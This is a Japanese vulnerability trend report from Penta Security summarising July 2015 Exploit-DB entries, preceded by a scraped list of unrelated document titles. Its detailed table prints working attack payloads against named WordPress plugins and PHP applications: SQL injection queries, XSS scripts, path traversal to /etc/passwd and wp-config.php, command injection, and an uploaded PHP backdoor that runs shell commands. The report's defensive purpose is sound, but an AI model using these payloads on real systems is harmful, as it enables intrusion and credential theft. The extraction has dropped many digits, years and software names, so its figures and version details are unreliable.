サマリー EDB-Report 最新 Web 脆弱性トレンドレポート (05.07) ~ Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報です ペンタセキュリティシステムズ株式会社 R&D センターデー

Similar documents
最新 Web トレンドレポート (06.04) ~ Exploit-DB( より公開されている内容に基づいたトレンド情報です サマリー ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 年 4

最新 Web 脆弱性トレンドレポート (06.0) ~ Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報です サマリー ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06

最新 Web 脆弱性トレンドレポート (05.09) ~ Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報です サマリー ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム

EDB-Report 最新 Web トレンドレポート (05.) 05..0~05.. Exploit-DB( より公開されている内容に基づいたトレンド情報です ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム サマリー 05

サマリー EDB-Report ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 年 8 月に公開された Exploit-DB の分析結果 Cross Site Scripting の攻撃に対する脆弱性報告件数が最も多かったです 発見された Cross Site

最新 Web 脆弱性トレンドレポート (08.0) ~08.0. Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報です ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム サマリー 08 年



最新 Web トレンドレポート (06.03) ~ Exploit-DB( より公開されている内容に基づいたトレンド情報です サマリー ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 年 3

サマリー EDB-Report 最新 Web 脆弱性トレンドレポート (207.09) ~ Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報です ペンタセキュリティシステムズ株式会社 R&D センタ

EDB-Report 最新Web脆弱性トレンドレポート(5.4) 5.4.~5.4.3 Exploit-DB( ペンタセキュリティシステムズ株式会社R&Dセンター データセキュリティチーム サマリー 5

最新 Web トレンドレポート (07.0) ~07.0. Exploit-DB( より公開されている内容に基づいたトレンド情報です サマリー ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 07 年 月に公開さ

サマリー EDB-Report 最新 Web 脆弱性トレンドレポート (06.07) ~ Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報です ペンタセキュリティシステムズ株式会社 R&D センターデー

サマリー EDB-Report 最新 Web トレンドレポート (06.0) ~ Exploit-DB( より公開されている内容に基づいたトレンド情報です ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチー

相続支払い対策ポイント

150423HC相続資産圧縮対策のポイント

ハピタス のコピー.pages

Copyright 2008 All Rights Reserved 2

Copyright 2006 Mitsui Bussan Secure Directions, Inc. All Rights Reserved. 3 Copyright 2006 Mitsui Bussan Secure Directions, Inc. All Rights Reserved.

初心者にもできるアメブロカスタマイズ新2016.pages

- 2 Copyright (C) All Rights Reserved.

% 11.1% +6.% 4, % %+12.2% 54,16 6.6% EV7, ,183 Copyright 216 JAPAN POST GROUP. All Rights Reserved. 1

内容 エグゼクティブサマリー 攻撃状況の概況 観測手法 収集結果 アカウントに対する攻撃 攻撃概要 攻撃状況 対策 テーマに対する攻撃 攻撃概要...

5-5_arai_JPNICSecSemi_XssCsrf_CM_ PDF

URL AdobeReader Copyright (C) All Rights Reserved.

Copyright All Rights Reserved. -2 -!

IPA:セキュアなインターネットサーバー構築に関する調査

Microsoft Word - 最終版 バックせどりismマニュアル .docx

itechclassifieds Middle School Horizon QCMS myseatxt 0.34 Joomla JV Comment PizzaInn_Project XOS Simple e-document Taboada Macronews godontologico 5 E

MultiPASS Suite 3.20 使用説明書

PowerPoint プレゼンテーション

実施していただく前に

Copyright 2009, SofTek Systems, Inc. All rights reserved.

untitled

PowerPoint Presentation

Copyright Qetic Inc. All Rights Reserved. 2

Releases080909

健康保険組合のあゆみ_top

リバースマップ原稿2

Copyright 2017 JAPAN POST BANK CO., LTD. All Rights Reserved. 1

EDB-Report 最新Web脆弱性トレンドレポート(07.) 07..0~07.. Exploit-DB( ペンタセキュリティシステムズ株式会社R&Dセンター データセキュリティチーム サマリー 0

P. 2 P. 4 P. 5 P. 6 P. 7 P. 9 P P.11 P.14 P.15 P.16 P.16 P.17 P.19 P.20 P.22 P P P P P P P P P

P. 2 P. 4 P. 5 P. 6 P. 7 P. 9 P.10 P.12 P.13 P.14 P.14 P.15 P.17 P.18 P.20 P P P P P.25 P.27 P.28 Copyright 2016 JAPAN POST BA

keysql42_usersguide

Windows Oracle -Web - Copyright Oracle Corporation Japan, All rights reserved.

やよいの顧客管理

弥生給与/やよいの給与計算

弥生 シリーズ

弥生会計 プロフェッショナル/スタンダード/やよいの青色申告

弥生会計/やよいの青色申告

弥生会計 ネットワーク/プロフェッショナル2ユーザー

Oracle Web Conferencing Oracle Collaboration Suite 2 (9.0.4) Creation Date: May 14, 2003 Last Update: Jan 21, 2005 Version: 1.21


Copyright 2008 NIFTY Corporation All rights reserved. 2

IM-SecureBlocker

VMware View Persona Management

untitled

2

MultiPASS B-20 MultiPASS Suite 3.10使用説明書

SiteLock操作マニュアル

Microsoft IISのWebDAV認証回避の脆弱性に関する検証レポート

P. 2 P. 4 P. 5 P. 6 P. 7 P. 9 P P.11 P.13 P.15 P.16 P.17 P.17 P.18 P.20 P.21 P.23 P P P P P P P P.31

Trend Micro Safe Lock 2.0 Patch1 管理コンソールのシステム要件 OS Windows XP (SP2/SP3) [Professional] Windows 7 (SP なし /SP1) [Professional / Enterprise / Ultimate] W

TOEIC(R) Newsletter

Copyright 2006 KDDI Corporation. All Rights Reserved page1

WEBシステムのセキュリティ技術


意外と簡単!?

WordPress Ktai Style Ktai Entry 18 Mac 18

1000 Copyright(C)2009 All Rights Reserved - 2 -

SQLインジェクション・ワームに関する現状と推奨する対策案

P2P? ( )? ( SOX ) ( ) COPYRIGHT 2005 SSH COMMUNICATIONS SECURITY CORP. ALL RIGHTS RESERVED. 2

02

2013_autumn.indb

タイトルを1~2行で入力 (長文の場合はフォントサイズを縮小)

2

! Copyright 2015 sapoyubi service All Rights Reserved. 2

Drive-by-Download攻撃における通信の 定性的特徴とその遷移を捉えた検知方式

report03_amanai.pages

report05_sugano.pages

96 8 PHPlot 1. ( 8.1) 4 1: // 2: // $_SERVER[ HTTP_REFERER ]... 3: // $_SERVER[ HTTP_USER_AGENT ]... 4: // $_SERVER[ REMOTE_ADDR ]... ( ) 5: // $_SERV

NetSkate

<%DOC NAME%> (User Manual)

82801pdf.pqxp

第3回_416.ppt

いま本文ー校了データ0822.indd

Oracle Change Management Pack, Oracle Diagnostics Pack, Oracle Tuning Packインストレーション・ガイド リリース2.2

shio_ PDF

Microsoft Project Project 1984 No.1 Project PMBOK (Project Management Body of Knowledge) 1 2 ( ) 3 3 Project 3 Project Standard/Professional Office Pr

Systemwalker IT Service Management Systemwalker IT Service Management V11.0L10 IT Service Management - Centric Manager Windows

untitled

untitled

システム要件 Trend Micro Safe Lock 2.0 SP1 Trend Micro Safe Lock 2.0 SP1 エージェントのシステム要件 OS Client OS Server OS Windows 2000 (SP4) [Professional] (32bit) Wind

Microsoft PowerPoint - webapp.ppt [互換モード]

42

pex7_manual

- 2 Copyright (C) All Rights Reserved.

自己紹介 はせがわようすけ ネットエージェント株式会社 株式会社セキュアスカイ テクノロジー技術顧問 Microsoft MVP for Consumer Security Oct

dekiru_asa

~ アドレス収集くん ~ セキュリティ対策御説明資料

Transcription:

05.07

サマリー EDB-Report 最新 Web 脆弱性トレンドレポート (05.07) 05.07.0~05.07.3 Exploit-DB(http://exploit-db.com) より公開されている内容に基づいた脆弱性トレンド情報です ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 05 年 7 月に公開された Exploit-DB を分析した結果 SQL インジェクション (SQL Injection) 攻撃に対する脆弱性が最も多く報告されました SQL インジェクション攻撃は 攻撃が可能かどうかを判断する単純なクエリーから 直接情報を抜き出すクエリー そしてシステムに一時的な障害を起こし 攻撃を試みるクエリーまで 攻撃難度から見ると 非常に多様であったことが分かりました SQL インジェクション攻撃はその特性上 攻撃が成功になると 次攻撃を仕掛け システム上の機密情報や個人情報が漏洩される可能性があるため 危険度が非常にい攻撃です 主要ソフトウェア別の脆弱性発生状況を見ると を含め つのソフトウェアにて (, Arap Portal,,,, ) SQL インジェクション攻撃が発見されました これらのソフトウェアを使用する企業の管理者様は セキュアコーディングの適用と定期的なアップデートを行い SQL インジェクション攻撃にさらされないよう 注意してください. 脆弱性別件数 脆弱性カテゴリ SQL インジェクション (SQL Injection) クロスサイトスクリプティング (Cross Site Scripting:XSS) ローカルファイル挿入 (Local File Inclusion:LFI) コマンドインジェクション (Command Injection) ディレクトリトラバーサル (Directory Traversal) ファイルアップロード (File Upload) 件数 5 合計 38 5 脆弱性別件数 0 8 0. 危険度別件数 危険度件数割合 危険度別分類 早急対応要 9 % 8 7% 合計 37 00% 9 早急対応要 8 3. 攻撃実行の難度別件数 難度 件数 割合 難 % 中 % 8% 合計 38 00% 攻撃実行の難度別件数 難 中. 主なソフトウェア別脆弱性発生件数ソフトウェア名 ger Arab Portal g phpsqlitecms phpliteadmin 合計 件数 3 3 3 38 0 8 0 主なソフトウェア別脆弱性発生件数 3 3 3 ger Arab Portal g phpsqlitecms phpliteadmin Copyright 05 Penta Security Systems Inc. All rights reserved

最新 Web 脆弱性トレンドレポート (05.07) 05.07.0~05.07.3 Exploit-DB(http://exploit-db.com) より公開されている内容に基づいた脆弱性トレンド情報です 危険度分類基準早急対応要 : 攻撃が成功した場合システムへ侵入可 : システム情報を取得するか あるいはクライアントに 次被害を及ぼす 中 : 情報漏洩攻撃実行難度分類基準難 : 複数の脆弱性を突いた攻撃パターン 対象のシステムの重要な情報を取得 するため 度な攻撃コードを採用したパターン 知らされていない攻撃 コードを採用したパターンのいずれかに該当する 中 : 攻撃手法自体は難しくないが 迂回コードを採用したパターン : 回のリクエストで攻撃が成立するパターン 複数回トライするも 既知の攻撃コードを採用したパターンのいずれかに該当する ** 5 件以上発生した主なソフトウェア別脆弱性の詳細情報 EDB 番号脆弱性カテゴリ攻撃難度危険度脆弱性名ソフトウェア名 37 SQL Injection 37 SQL Injection 375 File Upload 3753 SQL Injection 3750 SQL Injection 37559 LFI 早急対応要 3703 SQL Injection 3703 XSS 中 379 LFI 37707 SQL Injection 難 37705 SQL Injection 中 37705 SQL Injection 中 Albo Pretorio Online 3. - /albo-folder/ SQL Albo Pretorio Online 3. - admin.php SQL ACF Frontend Display Plugin.0.5 - index.php File Upload 脆弱性 EasyMap Plugin. - admin-ajax.php SQL CP Multi View Event Calendar Plugin..7 - /wordpress/ SQL CP Image Store with Slideshow Plugin.0.5 - /wp-path/ LFI 脆弱性 CP Contact Form with Paypal Plugin..5 - admin.php SQL CP Contact Form with Paypal Plugin..5 - admin.php BuddyPress Activity Plus Plugin.5 - adminajax.php LFI 脆弱性 Count Per Day Plugin 3. - counter-options.php SQL Unite Gallery Lite Plugin.. - admin-ajax.php SQL Unite Gallery Lite Plugin.. - admin.php SQL Copyright 05 Penta Security Systems Inc. All rights reserved

最新 Web 脆弱性トレンドレポート (05.07) 05.07.0~05.07.3 Exploit-DB(http://exploit-db.com) より公開されている内容に基づいた脆弱性トレンド情報です 05/07/0 37 SQL Injection Albo Pretorio Online 3. - /albo-folder/ SQL /albo-folder/?action=visatto&id=%0and%0= Albo Pretorio Online 3. 05/07/0 37 SQL Injection Albo Pretorio Online 3. - admin.php SQL /wpadmin/admin.php?page=responsabili&action=edit&id =%0and%0= Albo Pretorio Online 3. 05/07/07 3755 XSS 05/07/07 375 File Upload phpliteadmin. - phpliteadmin.php ACF Frontend Display Plugin.0.5 - index.php File Upload 脆弱性 /sectest/phpliteadmin_v- /phpliteadmin.php?droptable= <script>alert()</script> POST /wp-content/plugins/acf-frontenddisplay/js/blueimp-jquery-file-uploadd5deb/server/php/index.php HTTP/. Connection: Close Accept: text/html, application/xhtml+xml, */* Accept-Language: ko-kr User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT.; WOW; Trident/.0) Content-Type: multipart/form-data; boundary=------- --------------------7dd009908f phpliteadmin phpliteadmin. ACF Frontend Display Plugin.0.5 -----------------------------7dd009908f Content-Disposition: form-data; name="filedata"; filename="evil.php" Content-Type: application/octet-stream <? phpinfo();?> -----------------------------7dd009908f-- 05/07/08 3758 SQL Injection 中.5. - GetXmlTree.php SQL /centreon/include/common/xmltree/getxmltree.php? si d=%7%bif(%3c0,sleep(),%7%7)%b%7.5. 05/07/08 3758 ommand Injectio 中早急対応要.5. - ge tstats.php Command /centreon/include/administration/coreperformance/ge tstats.php?ns_id= +more+/etc/passwd+%3&key=a ctive_service_check&start=today&session_id=abc.5. 05/07/08 3753 SQL Injection EasyMap Plugin. - admin-ajax.php SQL POST /wp-admin/admin-ajax.php HTTP/. EasyMap Plugin. 05/07/0 3750 SQL Injection 05/07/0 37559 LFI 早急対応要 05/07/3 370 SQL Injection 難早急対応要 CP Multi View Event Calendar Plugin..7 - /wordpress/ SQL mapid=&mapname='+or+%3d%3b&action=e m_img_save_map_name /wordpress/?action=data_management&cpmvc_do_a ction=mvparse&f=edit&id=%0and%0= CP Image Store /wp-path/?action=cpis_init&cpis-action=fdownload&purchase_id=&cpis_user_email=i0secla with Slideshow Plugin.0.5 - /wp-path/ LFI 脆弱性 B@intermal.com&f=../../../../wp-config.php POST /process/planning.php HTTP/..3 - planning.php SQL Injection 脆 弱性 CP Multi View Event Calendar Plugin..7 CP Image Store with Slideshow Plugin.0.5.3 05/07/3 370 SQL Injection 難早急対応要 05/07/3 370 SQL Injection 難早急対応要 05/07/3 370 LFI 早急対応要.3 - user_groupes.php SQL filtregroupeprojet=&projet_anything=anything') union all select,table_name,333,,555,,777,888,999 from information_schema.tables# /user_groupes.php?page=&order=,(select%0case %0when%0(=)%0then%0%0else%0*(se lect%0%0from%0information_schema.tables)en d)=&by= /groupe_list.php?page=&order=,(select%0case%.3-0when%0(=0)%0then%0%0else%0*(sele groupe_list.php SQL Injection ct%0%0from%0information_schema.tables)end) 脆弱性 =&by=.3 - feries.php LFI 脆弱性 /process/feries.php?fichier=../../../../../../../etc/passw d.3.3.3 Copyright 05 Penta Security Systems Inc. All rights reserved

最新 Web 脆弱性トレンドレポート (05.07) 05.07.0~05.07.3 Exploit-DB(http://exploit-db.com) より公開されている内容に基づいた脆弱性トレンド情報です 05/07/3 3703 SQL Injection 05/07/3 3703 XSS 中 CP Contact Form /wpadmin/admin.php?page=cp_contact_form_paypal&u= with Paypal Plugin..5 - admin.php SQL Injection 脆弱 &r=0.558309358&name=csrf">update 性 CP Contact Form with Paypal Plugin..5 - admin.php POST /wpadmin/admin.php?page=cp_contact_form_paypal&cal =&r=0.880830800 HTTP/. CP Contact Form with Paypal Plugin..5 CP Contact Form with Paypal Plugin..5 fp_message=the following contact message has been sent:<%info%></textarea><script>alert();< /script> 05/07/3 370 XSS 05/07/3 370 XSS 05/07/3 370 XSS 05/07/3 370 Directory Traversal 05/07/3 3759 XSS..8 - adminupload.php..8 - backup_restore.php..8 - admin.php..8 - adminthemes-editor.php Directory Traversal 脆弱性 3.0. - /dashboard/settings/categori es/ /zenphoto-zenphoto-..8/zp-core/adminupload.php?error=%lt%3bscript%gt%3balert() %lt%3b%fscript%gt%3b /zenphoto-zenphoto-..8/zpcore/utilities/backup_restore.php?compression=%lt %3Bscript%gt%3Balert%8%9%lt%3B%Fsc ript%gt%3b /zenphoto-security-fixes/zpcore/admin.php?action=external&error=" onmouseover="alert('xsstest')" foo="bar&msg=hover over me! /zenphoto-zenphoto-..8/zp-core/admin-themeseditor.php?theme=../../../../../var/www&file=secret.p hp POST /dashboard/settings/categories/ HTTP/...8..8..8..8 3.0. name="><script>alert()</script> 05/07/3 3759 XSS 3.0. - /dashboard/settings/links/ POST /dashboard/settings/categories/ HTTP/. 3.0. title="><script>alert()</script> 05/07/3 3759 XSS 3.0. - /dashboard/tools/pingservers / POST /dashboard/tools/pingservers/ HTTP/. 3.0. 05/07/3 3759 SQL Injection 難早急対応要 Arab Portal 3 - members.php SQL url=http://www.zeroscience.mk"><script>alert()</s cript> POST members.php?action=singup HTTP/. Arab Portal Arab Portal 3 showemail=' AND (SELECT FROM(SELECT COUNT(*),CONCAT(version(),FLOOR(RAND(0)*))x FROM INFORMATION_SCHEMA.tables GROUP BY x)a) AND 'ali-ahmady'='ali-ahmady Copyright 05 Penta Security Systems Inc. All rights reserved

最新 Web 脆弱性トレンドレポート (05.07) 05.07.0~05.07.3 Exploit-DB(http://exploit-db.com) より公開されている内容に基づいた脆弱性トレンド情報です 05/07/3 37588 XSS 中 phpsqlitecms - index.php /ilosuna-phpsqlitecms-d9b89/ilosuna-phpsqlitecmsd9b89/cms/index.php?mode=comments&type=0& edit=9&comment_id="/><script>alert('xss by hyp3rlinx '%bdocument.cookie)</script>&page= phpsqlitec MS phpsqlitec MS 05/07/ 370 SQL Injection 難早急対応要.0.9 - ajax_search.php SQL POST members.php?action=singup HTTP/. search=getaccounts') UNION ALL SELECT NULL,NULL,account_name,account_login,account_pas s,account_url,null,null,null,null,null from accounts -- &start=0&skey=&sorder=&sk=08bad398bdb3cd 933befc57d08753b&is_ajax=&customer=0 &category=0&rpp=0.0.9 05/07/5 370 LFI 05/07/7 379 LFI DOCman Component /components/com_docman/dl.php?archive=0&file=.. - configuration.php LFI 脆弱性 /../../../../../../target/www/configuration.php BuddyPress Activity Plus Plugin.5 - admin-ajax.php LFI 脆弱性 POST /wp-admin/admin-ajax.php HTTP/. DOCman Component BuddyPress Activity Plus Plugin.5 data=bpfb_photos[]=../../../../wp-config.php 05/07/ 37 SQL Injection! Helpdesk Pro Plugin <..0 - index.php SQL POST /index.php?option=com_helpdeskpro&view=tickets HTTP/.! plugin Helpdesk Pro <..0 05/07/ 37 LFI 早急対応要 05/07/7 37708 Command Injection! Helpdesk Pro Plugin <..0 - / LFI 脆弱性 - login.php Command search=&category_id=0&status_id=- &limit=0&limitstart=0&option=com_helpdeskpro&t ask=&boxchecked=0&filter_order=sleep('0')&filter_ order_dir=desc /?option=com_helpdeskpro&task=ticket.download_att achment&filename=/../../../../../../../../../../../../etc/p asswd&original_filename=anyfilename.exe POST /login.php HTTP/.! plugin Helpdesk Pro <..0 id=admin' cat /etc/passwd a%0%3 &pass=admin&authtypeopti on=use_local&loginid= 05/07/7 37708 XSS - ajax_cmd.php /ajax_cmd.php?cmd=completgraphyrecording&f ilename=<img%0src%3da%0onload%3dalert()> 05/07/7 37708 LFI - read_sessionlog.php LFI 脆弱性 /opm/read_sessionlog.php?logfile=...//...//...//...// etc/passwd Copyright 05 Penta Security Systems Inc. All rights reserved

最新 Web 脆弱性トレンドレポート (05.07) 05.07.0~05.07.3 Exploit-DB(http://exploit-db.com) より公開されている内容に基づいた脆弱性トレンド情報です 05/07/7 37707 SQL Injection 難 05/07/7 37705 SQL Injection 中 Count Per Day Plugin 3. - counteroptions.php SQL POST /wp-admin/options-general.php?page=countper-day/counter-options.php&tab=tools HTTP/. cpd_keep_month= MONTH) AND =(select load_file(concat(char(9),char(9),(select version()),char(),char(97),char(),char( ),CHAR(97),CHAR(99),CHAR(07),CHAR(0),CHAR( ),CHAR(),CHAR(99),CHAR(),CHAR(09),CH AR(9),CHAR(0),CHAR(),CHAR(),CHAR(98), CHAR(97),CHAR()))) -- POST /wp-admin//admin-ajax.php HTTP/. Unite Gallery Lite Plugin.. - admin-ajax.php SQL Count Per Day Plugin 3. Unite Gallery Lite Plugin.. 05/07/7 37705 SQL Injection 中 05/07/7 37700 XSS data[galleryid]= AND (SELECT * FROM (SELECT(SLEEP(5)))rock) /wpadmin/admin.php?page=unitegallery&view=items&gal Unite Gallery Lite Plugin.. - admin.php SQL leryid=%0and%0(select%0*%0from%0(s ELECT(SLEEP(5)))rock) v3.0..9 Persistent XSS - /interface/rest/accounts/json POST /interface/rest/accounts/json HTTP/. Unite Gallery Lite Plugin.. v3.0..9 Persistent XSS name=<script>alert()</script> 05/07/8 37709 05/07/9 377 Command Injection Command Injection 中 ger 0.9.8 - index.php Command () ger 0.9.8 - index.php Command () /ger- 0.9.8/index.php?action=&current_dir=C:/xampp/htd ocs/ger- 0.9.8/&cmd=c%3A\Windows\system3\cmd.exe POST /ger-0.9.8/index.php HTTP/. g ger ger 0.9.8 ger 0.9.8 file_data='<?php+echo+'backdoor shell by hyp3rlinx...';+exec($_get['cmd']);+?> Copyright 05 Penta Security Systems Inc. All rights reserved